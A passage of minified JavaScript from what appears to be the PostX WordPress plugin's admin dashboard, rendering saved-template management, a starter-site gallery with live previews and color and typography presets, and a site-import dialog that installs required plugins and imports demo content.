","draft"==t.status?"Publish":"Draft"),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to delete?")&&A({action:"template_action",data:{type:"delete",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),"ultp_templates"==e.type&&(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&A({action:"template_action",data:{type:"duplicate",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")))))))),0==t.length&&s&&(0,a.createElement)("tr",null,"ultp_templates"==e.type?(0,a.createElement)("td",{colSpan:5},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post"))):(0,a.createElement)("td",{colSpan:10},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post")))),0==t.length&&!s&&(0,a.createElement)(a.Fragment,null,Array(5).fill(1).map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:20,unit2:"px",br:4}})),"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,Array(4).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"}))))):(0,a.createElement)(a.Fragment,null,Array(9).fill(1).map(((e,t)=>(0,a.createElement)("td",{key:t},(0,a.createElement)(l.Z,{type:"title",size:"99"})))))))))))),(0,a.createElement)("div",{className:"pageCon"},(0,a.createElement)("div",null,__("Page","ultimate-post")," ",g>0?c:g," ",__("of","ultimate-post")," ",g," ["," ",u," ",__("items","ultimate-post")," ]"),g>0&&(0,a.createElement)("div",{className:"ultpPages"},c>1&&(0,a.createElement)("span",{onClick:()=>{const e=c-1;z({pages:e}),d(e)}},o.ZP.leftAngle2),(0,a.createElement)("span",{className:"currentPage"},c),g>c&&(0,a.createElement)("span",{onClick:()=>{const e=c+1;z({pages:e}),d(e)}},o.ZP.rightAngle2)))),Z&&(0,i.cs)({tags:"menu_save_temp_pro",func:e=>{P(e)},data:{icon:"saved_template_lock.svg",title:__("Create Unlimited Saved Templates with PostX Pro","ultimate-post"),description:__("You can create only one saved template with the free version of PostX. Please upgrade to a pro plan to create unlimited saved templates.","ultimate-post")}}))}},3554:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(1383),o=n(448),i=n(4766),l=n(8949),s=n(356),p=n(814),c=n(6488);const{__}=wp.i18n,d=e=>{const[t,n]=(0,a.useState)({templates:[],designs:[],reloadId:"",reload:!1,isTemplate:!0,error:!1,fetching:!1,loading:!1}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)("all"),[h,g]=(0,a.useState)("all"),[v,_]=(0,a.useState)("all"),[w,b]=(0,a.useState)([]),[x,y]=(0,a.useState)(!1),[k,E]=(0,a.useState)({state:!1,status:""}),[C,S]=(0,a.useState)("3"),[M,L]=(0,a.useState)(""),[N,Z]=(0,a.useState)([]),{loading:P,fetching:z}=t,A=(0,r.t)(),B=async()=>{n((e=>({...e,loading:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&A.current&&e.data){const t=JSON.parse(e.data);Z(t),n((e=>({...e,loading:!1})))}}))},H=[{value:"all",label:__("All Categories","ultimate-post")},{value:"news",label:__("News","ultimate-post")},{value:"magazine",label:__("Magazine","ultimate-post")},{value:"blog",label:__("Blog","ultimate-post")},{value:"sports",label:__("Sports","ultimate-post")},{value:"fashion",label:__("Fashion","ultimate-post")},{value:"tech",label:__("Tech","ultimate-post")},{value:"travel",label:__("Travel","ultimate-post")},{value:"food",label:__("Food","ultimate-post")},{value:"movie",label:__("Movie","ultimate-post")},{value:"health",label:__("Health","ultimate-post")},{value:"gaming",label:__("Gaming","ultimate-post")},{value:"nft",label:__("NFT","ultimate-post")}];(0,a.useEffect)((()=>{T("","","fetchData"),B()}),[]);const T=(e,t="",n="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:n}}).then((e=>{e.success&&A.current&&(b(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{})),"fetchData"!=n&&E({status:"success",messages:[e.message],state:!0}))}))};if(M){document.querySelector("#adminmenumain").style="display: none;",document.querySelector(".ultp-settings-container").style="min-height: unset;";const e=N.filter((e=>e.live==M))[0];return(0,a.createElement)(p.Z,{_val:e,setLiveUrl:L,liveUrl:M})}document.querySelector("#adminmenumain").style="",document.querySelector(".ultp-settings-container").style="";let R=(0,o.cC)(w.join(""),[]);R&&"object"==typeof R&&!Array.isArray(R)&&(R=Object.keys(R).sort(((e,t)=>e-t)).map((e=>R[e])));const O=N.map((e=>e.ID)).sort(((e,t)=>t-e)).slice(0,3);return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-templatekit-wrap"},k.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:k,setToastMessages:E}),(0,a.createElement)("div",{className:"ultp-templatekit-list-container "},(0,a.createElement)(c.Z,{changeStates:(e,t)=>{"freePro"==e?_(t):"search"==e?u(t):"column"==e?S(t):"wishlist"==e?y(t):"trend"==e?(f(t),"latest"==t||"all"==t?N.sort(((e,t)=>t.ID-e.ID)):"popular"==t&&N[0]&&N[0].hit&&N.sort(((e,t)=>t.hit-e.hit))):"filter"==e&&g(t)},useState:a.useState,useEffect:a.useEffect,useRef:a.useRef,column:C,showWishList:x,_fetchFile:()=>{n((e=>({...e,fetching:!0}))),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&A.current&&(B(),n((e=>({...e,fetching:!1}))),E({status:"success",messages:[e.message],state:!0}))}))},fetching:z,searchQuery:d,fields:{filter:!0,trend:!0,freePro:!0},fieldOptions:{filterArr:H,trendArr:[],freeProArr:[]},fieldValue:{filter:h,trend:m,freePro:v}}),N.length>0?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col"+C},N.map((e=>e.title?.toLowerCase().includes(d.toLowerCase())&&("all"==h||"all"!=h&&(h==e.category||(Array.isArray(e.parent_cat)?e.parent_cat:Object.values(e.parent_cat||{})).includes(h)))&&("all"==v||"pro"==v&&e.pro||"free"==v&&!e.pro)&&(!x||x&&R?.includes(e.ID))&&(0,a.createElement)("div",{key:e.ID,className:"ultp-item-wrapper ultp-starter-group "},(0,a.createElement)("div",{className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)("a",{className:"ultp-templatekit-img bg-image-aspect",href:"#",style:{backgroundImage:`url(https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.ID}/postx_importer_img/pages/home.jpg)`}}),(0,a.createElement)("div",{className:"ultp-list-dark-overlay"},!ultp_dashboard_pannel.active&&(0,a.createElement)(a.Fragment,null,e.pro?(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,a.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",onClick:()=>L(e.live)},i.ZP.eye,__("Live Preview","ultimate-post"))),e.pro&&(0,a.createElement)("div",{className:"ultp-list-info-tag-pro"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)("div",{className:"ultp-list-info",onClick:()=>L(e.live)},(0,a.createElement)("div",{className:"ultp-list-info-title"},e.title,O.includes(e.ID)&&(0,a.createElement)("div",{className:"ultp-list-info-tag-new"},"NEW")),(0,a.createElement)("div",{className:"ultp-list-info-count"},e.templates?.length&&e.templates?.length+" templates")),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{T(e.ID,R?.includes(e.ID)?"remove":"")}},i.ZP[R?.includes(e.ID)?"love_solid":"love_line"]))))))))):P?(0,a.createElement)("div",{className:"ultp-premade-grid skeletonOverflow ultp-templatekit-col"+C},Array(25).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-item-list"},(0,a.createElement)("div",{className:"ultp-item-list-overlay"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:440,unit2:"px"}})),(0,a.createElement)("div",{className:"ultp-item-list-info"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,a.createElement)("span",{className:"ultp-action-btn"},(0,a.createElement)("span",{className:"ultp-premade-wishlist"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})))))))):(0,a.createElement)("span",{className:"ultp-image-rotate"},__("No Data Available…","ultimate-post")))))}},4371:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(448),o=n(5404);const{__}=wp.i18n,i=({ultpPresetColors:e,currentPresetColors:t,setCurrentPresetColors:n,setCurrentPostxGlobal:i,currentPostxGlobal:l})=>{const s={...e,rootCSS:(0,r.AJ)("styleCss",e)},[p,c]=(0,a.useState)({...t,...s}),[d,u]=(0,a.useState)(""),[m,f]=(0,a.useState)(!1),h=(0,r.AJ)("colorStacks"),g=(0,r.AJ)("presetColorKeys");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetColors","",(e=>{if(e.data){const t={...e.data,...p};n({...t,rootCSS:(0,r.AJ)("styleCss",t)})}}))}),[]);const v=(e,a="")=>{let o={...t,...e};"darkhandle"!=a&&m&&(o=_(o));const i=((e={},t="")=>{const n=(0,r.AJ)("styleCss",e),a=document.querySelector("#ultp-starter-preview");if(a.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:n,dlMode:"darkhandle"==t?m?"ultpLight":"ultpDark":m?"ultpDark":"ultpLight"};a.contentWindow.postMessage(e,"*")}return n})(o,a);c(o),n({...o,rootCSS:i})},_=(e={})=>({...e,Base_1_color:e.Contrast_1_color,Base_2_color:e.Contrast_2_color,Base_3_color:e.Contrast_3_color,Contrast_1_color:e.Base_1_color,Contrast_2_color:e.Base_2_color,Contrast_3_color:e.Base_3_color});return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_dark_container"},(0,a.createElement)("div",{onClick:()=>(()=>{const e=_(t);document.querySelector(".ultp-dl-container .ultp-dl-svg-con").style=`transform: translateX(${m?"":"calc( 100% + 71px )"}); transition: transform .4s ease`,document.querySelector(".ultp-dl-container .ultp-dl-svg-title").style=`transform: translateX(${m?"":"calc( -100% + 50px )"}); transition: transform .4s ease`,setTimeout((()=>{f(!m),i({...l,enableDark:!m}),v(e,"darkhandle")}),400)})(),className:" ultp-dl-container "},(0,a.createElement)("div",{className:"ultp-dl-svg-con "+(m?"dark":"")},(0,a.createElement)("div",{className:"ultp-dl-svg"},o.Z[m?"moon":"sun"])),(0,a.createElement)("div",{className:"ultp-dl-svg-title"},m?"Dark Mode":"Light Mode"))),(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Color Palette","ultimate-post")),d&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{u(""),v(s)}})),(0,a.createElement)("ul",{className:"ultp-color-group"},h.map(((e,t)=>(0,a.createElement)("li",{className:"ultp_starter_preset_list "+(d==t+1?"active":""),key:t,onClick:()=>{const n={};u(t+1),g.forEach(((t,a)=>{n[t]=e[a]})),v(n)}},e.map(((e,t)=>![1,2,6,8,9].includes(t+1)&&(0,a.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:e}}))))))))}},5066:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(448);const{__}=wp.i18n,o=({ultpPresetTypos:e,currentPresetTypos:t,setCurrentPresetTypos:n})=>{const o={...e,presetTypoCSS:(0,r.AJ)("typoCSS",e,!0)},[i,l]=(0,a.useState)({...t,...o}),[s,p]=(0,a.useState)(""),c=(0,r.AJ)("presetTypoKeys"),d=(0,r.AJ)("typoStacks");(0,a.useEffect)((()=>{(0,r.x2)("get","ultpPresetTypos","",(e=>{if(e.data){const t={...e.data,...i};l({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)}),n({...t,presetTypoCSS:(0,r.AJ)("typoCSS",t,!0)})}}))}),[]);const u=e=>{const a={...t,...e},o=((e={})=>{const t=(0,r.AJ)("typoCSS",e,!0),n=document.querySelector("#ultp-starter-preview");if(n.contentWindow){const e={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};n.contentWindow.postMessage(e,"*")}return t})(a);l(a),n({...a,presetTypoCSS:o})};return(0,a.createElement)("div",{className:"ultp_starter_preset_container"},(0,a.createElement)("div",{className:"ultp_starter_reset_container"},(0,a.createElement)("div",{className:"packs_title"},__("Change Font & Typography","ultimate-post")),s&&(0,a.createElement)("span",{className:"dashicons dashicons-image-rotate",onClick:()=>{p(""),u(o)}})),(0,a.createElement)("ul",{className:"ultp-typo-group"},d.map(((e,n)=>(0,a.createElement)("li",{title:`${e[0].family}/${e[1].family}`,className:"ultp_starter_preset_typo_list "+(s==n+1?"active":""),key:n,onClick:()=>{const a={};p(n+1),c.forEach(((n,r)=>{a[n]={...t[n]},a[n].family=e[r].family,a[n].type=e[r].type,a[n].weight=e[r].weight})),u(a)}},e.map(((e,t)=>(0,a.createElement)("span",{key:t},(0,a.createElement)("style",null,(0,r.AJ)("font_load",e,!0)),(0,a.createElement)("span",{key:t,className:"",style:{fontFamily:`${e.family}, ${e.type}`}},0==t?"A":"a")))))))))}},5324:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(4766);const o=e=>{const{useState:t,useEffect:n,useRef:o,onChange:i,options:l,value:s,contentWH:p}=e,[c,d]=t(!1),u=o(null),m=e=>{u?.current&&!u?.current.contains(e.target)?d(!1):u?.current&&u?.current.contains(e.target)&&!e.target.classList?.contains("ultp-reserve-button")&&d(!u?.current.classList?.contains("open"))};n((()=>(document.addEventListener("mousedown",m),()=>document.removeEventListener("mousedown",m))),[]);const f=l?.find((e=>e.value===s));return(0,a.createElement)("div",{ref:u,className:"starter_filter_select "+(c?"open":"")},(0,a.createElement)("div",{className:"starter_filter_selected"},f?f.label:"Select an option",r.ZP.collapse_bottom_line),c&&(0,a.createElement)("ul",{className:"starter_filter_select_options",style:{minWidth:p?.width||"100px",maxHeight:p?.height||"160px"}},l.map(((e,t)=>(0,a.createElement)("li",{className:"ultp-reserve-button starter_filter_select_option",key:t,onClick:()=>(e=>{d(!1),i(e.value)})(e)},e.label)))))}},814:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var a=n(7294),r=n(448),o=n(4766),i=n(4482),l=n(8949),s=n(4371),p=n(5066);n(4602);const{__}=wp.i18n,c=e=>{const{_val:t,setLiveUrl:n,liveUrl:c}=e,[d,u]=(0,a.useState)({}),[m,f]=(0,a.useState)({}),[h,g]=(0,a.useState)({}),v={deletePrevious:"yes",installPlugin:"yes",user_email:ultp_dashboard_pannel.user_email,get_newsletter:"yes",importDummy:"yes"},[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(!1),[y,k]=(0,a.useState)(!1),[E,C]=(0,a.useState)([]),[S,M]=(0,a.useState)(v),[L,N]=(0,a.useState)(0),[Z,P]=(0,a.useState)({type:"desktop",width:"100%"}),[z,A]=(0,a.useState)(!1),[B,H]=(0,a.useState)(!0),[T,R]=(0,a.useState)(!1),[O,j]=(0,a.useState)({plugin:!1,content:!1}),[V,F]=(0,a.useState)(!1),[W,D]=(0,a.useState)({}),[I,U]=(0,a.useState)({}),[$,G]=(0,a.useState)([]);(0,a.useEffect)((()=>{window.fetch("https://postxkit.wpxpo.com/"+t.live+"/wp-json/importer/global_settings",{method:"GET"}).then((e=>e.text())).then((e=>{const t=(0,r.cC)(e,{});t.success&&(((e={})=>{wp.apiFetch({path:"/ultp/v1/action_option",method:"POST",data:{type:"get"}}).then((t=>{if(t.success){let n={...t.data,...e};n={...n,globalCSS:(0,r.AJ)("globalCSS",n)},g(n)}}))})(t.postx_global),D(t.ultpPresetColors),U(t.ultpPresetTypos),G(t.plugins))})).catch((e=>{}))}),[]);const q=(e,t,n,r="")=>(0,a.createElement)("div",{className:"input_container"},"checkbox"==t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultChecked:!(!S[e]||"yes"!=S[e]),onChange:t=>{const n=t.target.checked?"yes":"no";M({...S,[e]:n})}}),"checkbox"!=t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultValue:S[e]||"",onChange:t=>{const n=t.target.value;M({...S,[e]:n})}}),n&&(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},n)));return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:" ultp_starter_packs_demo theme-install-overlay wp-full-overlay expanded "+(B?"active":"inactive"),style:{display:"block"}},(0,a.createElement)("div",{className:"wp-full-overlay-sidebar "},(0,a.createElement)("div",{className:"wp-full-overlay-header"},(0,a.createElement)("div",{className:"ultp_starter_packs_demo_header"},(0,a.createElement)("div",{className:"packs_title"},t.title,(0,a.createElement)("span",null,t.category)),(0,a.createElement)("button",{onClick:()=>n(""),className:"close-full-overlay"})),(0,a.createElement)("div",{className:"ultp-starter-collapse "+(B?"active":"inactive"),onClick:()=>{H(!B)}},o.ZP.collapse_bottom_line)),Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}})))))),(0,a.createElement)("div",{className:"wp-full-overlay-sidebar-content"},W.hasOwnProperty("Base_1_color")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(s.Z,{ultpPresetColors:W,currentPresetColors:d,setCurrentPresetColors:u,currentPostxGlobal:h,setCurrentPostxGlobal:g})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:40,unit2:"px",br:40}}),(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}})))))),I.hasOwnProperty("Body_and_Others_typo")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(p.Z,{ultpPresetTypos:I,currentPresetTypos:m,setCurrentPresetTypos:f})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}}))))))),(0,a.createElement)("div",{className:"wp-full-overlay-footer"},(0,a.createElement)("div",{className:"ultp_starter_import_options"},(0,a.createElement)("div",{className:"option_buttons"},t.pro&&!ultp_dashboard_pannel.active?(0,i.hx)(`https://www.wpxpo.com/postx/?utm_source=db-postx-starter&utm_medium=${t.live}-upgrade-pro&utm_campaign=postx-dashboard#pricing`,""):(0,a.createElement)("a",{className:"ultp-starter-button",onClick:()=>{w(!0)}},__("Import Site","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-starter-packs-device-container"},(0,a.createElement)("span",{onClick:()=>P({type:"desktop",width:"100%"}),className:"ultp-starter-packs-device "+("desktop"==Z.type?"d-active":"")},o.ZP.desktop),(0,a.createElement)("span",{onClick:()=>P({type:"tablet",width:(h.breakpointSm||"990")+"px"}),className:"ultp-starter-packs-device "+("tablet"==Z.type?"d-active":"")},o.ZP.tablet),(0,a.createElement)("span",{onClick:()=>P({type:"mobile",width:(h.breakpointXs||"767")+"px"}),className:"ultp-starter-packs-device "+("mobile"==Z.type?"d-active":"")},o.ZP.mobile))))),(0,a.createElement)("div",{className:"wp-full-overlay-main"},!T&&(0,a.createElement)("div",{className:"iframe_loader"},(0,a.createElement)("div",{className:"iframe_container"},(0,a.createElement)("div",{className:"iframe_header"},(0,a.createElement)("div",{className:"iframe_header_top"},(0,a.createElement)("div",{className:"header_top_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:60,unit2:"px",br:60}})),(0,a.createElement)("div",{className:"header_top_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),Array(3).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:30,unit1:"px",size2:30,unit2:"px",br:30}})))))),(0,a.createElement)("div",{className:"iframe_body_content"},(0,a.createElement)("div",{className:"iframe_body_slider"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:36,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"iframe_body"},(0,a.createElement)("div",{className:"iframe_body_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"iframe_body_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}})))))),(0,a.createElement)("iframe",{className:`${Z.type}View`,onLoad:()=>{R(!0),(()=>{const e=document.querySelector("#ultp-starter-preview");if(d.hasOwnProperty("Base_1_color")){const t=(0,r.AJ)("styleCss",d);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:t,dlMode:h.enableDark?"ultpDark":"ultpLight"};e.contentWindow.postMessage(n,"*")}}if(m.hasOwnProperty("Body_and_Others_typo")){const t=(0,r.AJ)("typoCSS",m,!0);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};e.contentWindow.postMessage(n,"*")}}})()},style:{display:"block",margin:"0 auto",maxWidth:Z.width},id:"ultp-starter-preview",src:"https://postxkit.wpxpo.com/"+c}))),_&&(0,a.createElement)("div",{className:"ultp-stater-container-settings-overlay"},(0,a.createElement)("div",{className:"ultp-stater-settings-container"},(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-popup-stater"},b?(0,a.createElement)(a.Fragment,null,y?(0,a.createElement)("div",{className:"ultp_processing_import"},(0,a.createElement)("div",{className:"stater_title"},__(`Started building ${t.title} website`,"ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp_import_builders ultp-info"},__("The import process can take a few seconds depending on the size of the kit you are importing and speed of the connection.","ultimate-post")," ",(0,a.createElement)("br",null),(O.plugin||O.content)&&(0,a.createElement)("div",{className:"progress"},(0,a.createElement)("div",null,(0,a.createElement)("strong",null,"Progress:")," ",O.plugin?"Plugin Installation is":O.content?"Page/Posts/Media Importing is":"Site Importing"," ","on progress..")))),(0,a.createElement)("div",{className:"ultp_processing_show"},(0,a.createElement)("div",{className:"ultp-importer-loader"},(0,a.createElement)("div",{id:"ultp-importer-loader-bar",style:{width:L+"%"}}),(0,a.createElement)("div",{id:"ultp-importer-loader-percentage",style:{color:L>52?"#fff":"#000"}},L+"%"))),(0,a.createElement)("div",{className:"ultp_import_notice"},(0,a.createElement)("span",null,__("Note:","ultimate-post")),__("Please do not close this browser window until import is completed.","ultimate-post"))):(0,a.createElement)("div",{className:"ultp_successful_import"},(0,a.createElement)("div",{className:"stater_title"},t.title,__(` Imported ${V?"Failed":"Successfully"} `,"ultimate-post")),(0,a.createElement)("div",null,V?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Due to resquest timeout this import is failed","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.reload()}},__("Refresh","ultimate-post")),__("page and try again","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Navigate to","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.href=ultp_dashboard_pannel.builder_url,window.location.reload()}},__("Site Builder to edit","ultimate-post")),__("your Archive, Post, Default Page and other templates.","ultimate-post")),(0,a.createElement)("a",{className:"ultp-primary-button",href:ultp_dashboard_pannel.home_url},__("View Your Website","ultimate-post")))))):(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-info ultp-info-desc"}," ",__("Import the entire site including posts, images, pages, content and plugins.","ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Import Settings","ultimate-post")),q("importDummy","checkbox",__("Import dummy post, taxonomy and featured images","ultimate-post")),q("deletePrevious","checkbox",__("Delete Previously imported sites","ultimate-post")),q("installPlugin","checkbox",__("Install required plugins","ultimate-post"))),(0,a.createElement)("div",{className:"starter_page_impports"},(0,a.createElement)("div",{className:"stater_title"},__("Template/Pages","ultimate-post")),t?.templates?.map(((e,t)=>(!z&&t<3||z)&&(0,a.createElement)("div",{key:t,className:"input_container"},(0,a.createElement)("input",{type:"checkbox",defaultChecked:!E.includes(e.name),onChange:t=>{t.target.checked&&E.includes(e.name)?C(E.filter((t=>t!==e.name))):t.target.checked||E.includes(e.name)||C([...E,e.name])}}),(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},e.name))))),t.templates.length>3&&(0,a.createElement)("div",{className:"cursor",onClick:()=>{A(!z)}},"Show "+(z?"less":"more")," ",o.ZP.videoplay)),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Subscribe","ultimate-post")),(0,a.createElement)("span",null,__("Stay up to date with the latest started templates and special offers","ultimate-post")),q("user_email","email","","email_box"),q("get_newsletter","checkbox",__("Stay updated with exciting features and news."),"get_newsletter")))),!b&&(0,a.createElement)("div",{className:"starter_import "},(0,a.createElement)("a",{className:"ultp-primary-button",onClick:()=>(async e=>{x(!0);let n,a=0;async function o(e,t,r){n=setInterval((()=>{e>=t?clearInterval(n):(e++,a++,N(e))}),r)}if(o(a,70,"yes"==S.importDummy?800:400),e){x(!0),k(!0);const i=$;if((0,r.x2)("set","ultpPresetColors",d),(0,r.x2)("set","ultpPresetTypos",m),wp.apiFetch({method:"POST",path:"/ultp/v1/action_option",data:{type:"set",data:h}}),"yes"==S.deletePrevious||"yes"==S.get_newsletter){const e=new Promise(((e,t)=>{wp.apiFetch({path:"/ultp/v3/deletepost_getnewsletters",method:"POST",data:{deletePrevious:S.deletePrevious,get_newsletter:S.get_newsletter}}).then((t=>{e("responsed")}))}));await e}if("yes"==S.importDummy){const t=new Promise(((t,n)=>{wp.apiFetch({path:"/ultp/v3/starter_dummy_post",method:"POST",data:{api_endpoint:e,importDummy:S.importDummy}}).then((e=>{t("responsed")})).catch((e=>{console.log(e),t("responsed")}))}));await t}if("yes"==S?.installPlugin){j({...O,plugin:!0});const e=i.map(((e,t)=>new Promise(((t,n)=>{jQuery.ajax({type:"POST",url:ultp_dashboard_pannel.ajax,data:{action:"install_required_plugin",wpnonce:ultp_dashboard_pannel.security,plugin:JSON.stringify(e)}}).done((function(e){t("responsed")}))}))));await Promise.all(e),j({...O,plugin:!1})}clearInterval(n),o(a+1,80,500);const 